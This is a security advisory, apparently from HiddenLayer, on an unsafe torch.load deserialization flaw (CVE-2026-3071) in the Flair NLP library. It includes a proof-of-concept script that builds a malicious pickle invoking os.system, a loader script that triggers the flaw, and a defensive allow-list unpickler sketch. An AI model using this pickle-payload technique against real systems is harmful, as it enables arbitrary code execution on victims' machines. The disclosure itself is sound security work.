Flair Vulnerability Report

February 26, 2026

CVE Number

CVE-2026-3071

Summary

The load_language_model method in the LanguageModel class calls torch.load() to deserialize model data with the optional weights_only parameter set to False, which is unsafe. With that setting, torch relies on pickle under the hood, so it can execute arbitrary code if the input file is malicious. If an attacker controls the model file or the path it is loaded from, this results in remote code execution (RCE).
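
To make the mechanism concrete, here is a minimal, harmless sketch that uses only Python's standard pickle module (no Flair or PyTorch involved). The Payload class and the expression passed to eval are illustrative assumptions, not part of the Flair code base; eval stands in for a more damaging callable such as os.system.

```python
import pickle


class Payload:
    """Illustrative class (an assumption for this sketch, not Flair code)."""

    def __reduce__(self):
        # Instead of object state, pickle records "call eval('6 * 7')".
        return eval, ("6 * 7",)


blob = pickle.dumps(Payload())  # serializing does not run the callable
result = pickle.loads(blob)     # deserializing does: eval("6 * 7") is invoked

print(result)                       # 42
print(isinstance(result, Payload))  # False: the loader returned eval's result
```

The loader never checks what the callable is, which is why any file handed to an unrestricted pickle-based loader has to be treated as code.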

Products Impacted

This vulnerability is present from v0.4.1 through the latest version.

CVSS Score: 8.4

CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
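
As a sanity check on the score, the following sketch recomputes the base score from the vector, written here in the slash-separated form used by the CVSS v3.0 specification. The weights and equations are those of the specification for Scope: Unchanged; the function and variable names are illustrative, and the sketch deliberately does not handle Scope: Changed or the temporal and environmental metrics.

```python
import math

# Base metric weights from the CVSS v3.0 specification (Scope: Unchanged only).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.20},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value):
    """Round up to one decimal place, as the specification requires."""
    return math.ceil(value * 10) / 10


def base_score(vector):
    """Compute the CVSS v3.0 base score for a Scope: Unchanged vector."""
    # Skip the "CVSS:3.0" prefix, then map each metric to its value.
    metrics = dict(item.split(":") for item in vector.split("/")[1:])
    if metrics["S"] != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    w = {name: WEIGHTS[name][metrics[name]] for name in WEIGHTS}

    impact_sub_score = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * impact_sub_score
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]

    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"))  # 8.4
```

Impact comes to roughly 5.87 and exploitability to roughly 2.52; their sum of about 8.39 rounds up to 8.4, matching the score reported above.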

CWE Categorization

CWE-502: Deserialization of Untrusted Data.

Details

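In flair/embeddings/token.py, the FlairEmbeddings class’s __init__ method relies on LanguageModel.load_language_model whenever the model argument is not already a LanguageModel instance, so a model path passed to FlairEmbeddings reaches the unsafe torch.load() call.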

flair/models/language_model.py

class LanguageModel(nn.Module):
    # ...

    @classmethod
    def load_language_model(cls, model_file: Union[Path, str], has_decoder=True):
        state = torch.load(str(model_file), map_location=flair.device, weights_only=False)

        document_delimiter = state.get("document_delimiter", "\n")
        has_decoder = state.get("has_decoder", True) and has_decoder

        model = cls(
            dictionary=state["dictionary"],
            is_forward_lm=state["is_forward_lm"],
            hidden_size=state["hidden_size"],
            nlayers=state["nlayers"],
            embedding_size=state["embedding_size"],
            nout=state["nout"],
            document_delimiter=document_delimiter,
            dropout=state["dropout"],
            recurrent_type=state.get("recurrent_type", "lstm"),
            has_decoder=has_decoder,
        )
        model.load_state_dict(state["state_dict"], strict=has_decoder)
        model.eval()
        model.to(flair.device)

        return model

flair/embeddings/token.py

@register_embeddings
class FlairEmbeddings(TokenEmbeddings):
    """Contextual string embeddings of words, as proposed in Akbik et al., 2018."""

    def __init__(
        self,
        model,
        fine_tune: bool = False,
        chars_per_chunk: int = 512,
        with_whitespace: bool = True,
        tokenized_lm: bool = True,
        is_lower: bool = False,
        name: Optional[str] = None,
        has_decoder: bool = False,
    ) -> None:
        # ...
        # shortened for clarity
        # ...

        from flair.models import LanguageModel

        if isinstance(model, LanguageModel):
            self.lm: LanguageModel = model
            self.name = f"Task-LSTM-{self.lm.hidden_size}-{self.lm.nlayers}-{self.lm.is_forward_lm}"
        else:
            self.lm = LanguageModel.load_language_model(model, has_decoder=has_decoder)

        # ...
        # shortened for clarity
        # ...



The gen.py script below generates a malicious pickle file, and exploit.py loads that file through LanguageModel.load_language_model, the same method the FlairEmbeddings class calls internally. Running it shows that the malicious code is executed.

gen.py

import pickle

class Exploit(object):
    def __reduce__(self):
        import os
        return os.system, ("echo 'Exploited by HiddenLayer'",)

bad = pickle.dumps(Exploit())

with open("evil.pkl", "wb") as f:
    f.write(bad)

exploit.py

from flair.embeddings import FlairEmbeddings
from flair.models import LanguageModel

lm = LanguageModel.load_language_model("evil.pkl")

fe = FlairEmbeddings(
    lm,
    fine_tune=False,
    chars_per_chunk=512,
    with_whitespace=True,
    tokenized_lm=True,
    is_lower=False,
    name=None,
    has_decoder=False
)

Once both files are in place, running exploit.py prints “Exploited by HiddenLayer”.

This confirms we were able to run arbitrary code.
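
For contrast, the sketch below shows the general allow-list idea behind restricted unpickling, following the "restricting globals" pattern from the Python pickle documentation. It is not PyTorch's or Flair's implementation: the RestrictedUnpickler class, the ALLOWED_GLOBALS set, the Payload class, and the sample dictionary values are all assumptions made for illustration. PyTorch documents weights_only=True as restricting its unpickler in a comparable spirit, to tensors, primitive types, dictionaries, and explicitly allow-listed types.

```python
import io
import pickle

# Hypothetical allow-list: only these (module, name) pairs may be resolved.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global outside the allow-list."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is not allowed")


def restricted_loads(data):
    """Deserialize bytes using the restricted unpickler."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Payload:
    """Illustrative malicious object; eval stands in for os.system."""

    def __reduce__(self):
        return eval, ("6 * 7",)


# Plain containers and primitives need no globals, so they load normally.
safe_blob = pickle.dumps({"hidden_size": 2048, "nlayers": 1})
print(restricted_loads(safe_blob))

# The payload needs builtins.eval, which is not on the allow-list.
try:
    restricted_loads(pickle.dumps(Payload()))
except pickle.UnpicklingError as err:
    print("blocked:", err)
```

The important property is that the callable is rejected before it is ever invoked, rather than being detected after the fact.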

Timeline

11 December 2025 - Vulnerability reported by email, as per SECURITY.md

8 January 2026 - No response from vendor

12 February 2026 - Follow-up email sent

26 February 2026 - Public disclosure

Project URL:

Flair: https://flairnlp.github.io/

Flair GitHub Repo: https://github.com/flairNLP/flair

RESEARCHER: Esteban Tonglet, Security Researcher, HiddenLayer
